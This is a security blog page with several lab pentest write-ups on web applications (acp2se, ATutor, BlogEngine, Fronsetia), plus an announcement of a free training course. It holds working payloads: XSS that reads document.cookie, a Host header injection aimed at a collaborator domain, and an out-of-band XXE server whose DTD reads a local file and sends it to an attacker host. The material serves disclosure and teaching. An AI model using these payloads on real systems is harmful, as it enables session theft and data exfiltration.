MSecure

Wednesday, 19 February 2025

Friday Fun Pentest Series - 19 - Self Stored XSS - acp2sev7.2.2

Description

- It was found that the application had problems around sanitizing and output encoding correctly, leading to Self Stored XSS.

Self Stored XSS #1

Steps to Reproduce:

Visit "http://192.168.58.168/acp2se/mul/muladmin.php" and login with "admin" / "adminpass"
In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)>

// HTTP POST request

POST /acp2se/mul/muladmin.php HTTP/1.1

Host: 192.168.58.168

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0

[...]

name="><svg onload=prompt(document.cookie)>&submit=Submit

// HTTP Response

HTTP/1.1 200 OK

Date: Wed, 19 Feb 2025 08:22:26 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 1210

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

[...]

<th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b>

[...]

Sunday, 16 February 2025

New Web Security Training Course !

Its been a while since I have released any papers related to web security. Without any further delay let me introduce you the "Web Security Training" training manual.

Introduction

Aimed at those that would like to learn more about web security and web app pentesting. The "course" is freely available, with taking the approach of "learn as you practice".

Each topic has a few bullet points describing what the vulnerability entails, then a screenshot and relevant payload, demonstrating the exploitation of the misconfiguration or the relevant issue.

Download Link

File is in PDF format. Requires the download of a VM (virtual machine) OWASP BWA. The course demonstrates OWASP Top 10 flaws and beyond. It is free of charge. Worth mentioning how good the "Mutillidae" web application is for training purposes.

https://drive[dot]google[dot]com/file/d/14FWeVKHz00hIrZH9x6Z4B5MHPH2K3cAu/view?usp=sharing

Saturday, 18 January 2025

Friday Fun Pentest Series - 18 - Host Header Injection - atutorv2.2.4

Description

- It was found that the application had a Host Header Injection vulnerability.

Host Header Injection #1

Steps to Reproduce:

Visit specific page of the application
Intercept the HTTP GET/POST request
Modify the Host header to a domain of attackers choice
Forward the HTTP request

// HTTP GET request

GET /atutor/bounce.php?course=0 HTTP/1.1

Host: yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://192.168.1.110/atutor/login.php

Connection: keep-alive

Cookie: ATutorID=oukcasgb86k60mefasc36joje4; flash=no

Upgrade-Insecure-Requests: 1

Priority: u=0, i

// HTTP response

HTTP/1.1 302 Found

Date: Thu, 09 Jan 2025 18:55:35 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: ATutorID=nl8ahpeo2tsd0mc4d2a0br4a94; path=/atutor/; HttpOnly

Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0

Set-Cookie: nexthelp_cookie=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/

Location: http://yz13ej73z3j9dnnv3rt0yxqeg5mwauyj.oastify.com/atutor/login.php

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

Friday Fun Pentest Series - 17 - Reflected XSS - atutorv2.2.4

Description

- It was found that the application was vulnerable to Reflected XSS.

Reflected XSS #1 - "theme_dir"

Steps to Reproduce:

Login to the application with admin user
Paste the following URL into the browser

http://192.168.1.110/atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2

// HTTP GET Request

GET /atutor/mods/_core/themes/index.php?type=Mobile&enable=Enable&theme_dir=<script>alert(1)</script>&mobile_version=2.2.2 HTTP/1.1

Host: 192.168.1.110

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate, br

Connection: keep-alive

Cookie: ATutorID=f6oaq82rkkjc2efnmi1qkig537; flash=no

Upgrade-Insecure-Requests: 1

Priority: u=0, i

// HTTP Response

HTTP/1.1 302 Found

Date: Sat, 18 Jan 2025 20:39:58 GMT

Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3

X-Powered-By: PHP/5.6.40

Set-Cookie: ATutorID=o0p8bdoggbsj1h0lf1des5gcm1; path=/atutor/; HttpOnly

Set-Cookie: flash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0

Location: /atutor/mods/_core/themes/index.php

Vary: Accept-Encoding

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=utf-8

Saturday, 14 December 2024

Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8

Description

- It was found that the application was vulnerable to Stored XSS via specific payload that bypassed the filtering in place.

Stored XSS Filter Bypass #1 - "Add Category"

Steps to Reproduce:

Login as admin and go to "Content" > "Posts"
On the right side of the page choose "Categories"
In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>

// HTTP PUT request

PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

[...]

","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}

[...]

// HTTP response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0

// HTTP GET request

GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]

// HTTP response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229

[...]
<span class="post-category"><a href="/blogengine/category/<b>12345<b><script>alert(1)<script><b>12345=<b>"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]

Thursday, 21 November 2024

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description

- The application is vulnerable to OOB XXE injection

XXE #1 - "show_operations.jsp"

Steps to Reproduce:

Add Python3 server to serve malicious XXE payload
Add a file on the file system to be read via the application XXE payload echo 123123 > /tmp
Enter the following URL as input

http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl

// Python Server Code

from flask import Flask, Response, request

import logging

app = Flask(__name__)

# Set up logging

logging.basicConfig(level=logging.DEBUG)

@app.route('/testxxeService', defaults={'path': ''})

def catch_all(path):

app.logger.debug("Serving XXE payload")

xml = """<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE data [

<!ENTITY % dtd SYSTEM "http:// 192.168.78.1:10000/data.dtd"> %dtd;

<data>&send;</data>"""

return Response(xml, mimetype='text/xml', status=200)

@app.route('/data.dtd', defaults={'path': ''})

def hello(path):

app.logger.debug("DTD requested")

xml = """<!ENTITY % file SYSTEM "file:///tmp/123">

<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">

%eval;

%exfil;"""

return Response(xml, mimetype='text/xml', status=200)

if __name__ == "__main__":

app.run(host='0.0.0.0', port=10000)

Wednesday, 20 November 2024

Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1

Description

- It was found that the application was vulnerable to Reflected XSS

Reflected XSS #1 - "show_operations.jsp"

Steps to Reproduce:

Visit main page of the application.
In the input field of "WSDL Location" enter the following payload "><img src=x onerror=alert(1)>

// HTTP GET Request

GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1

Host: 192.168.78.128:8080

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0

[...]

// HTTP Response

HTTP/1.1 200

Content-Type: text/html;charset=ISO-8859-1

Content-Length: 6360

Date: Wed, 20 Nov 2024 19:42:15 GMT

Keep-Alive: timeout=20

Connection: keep-alive

[...]

<title> Fronsetia: "><img src=x onerror=alert(1)> </title>

[...]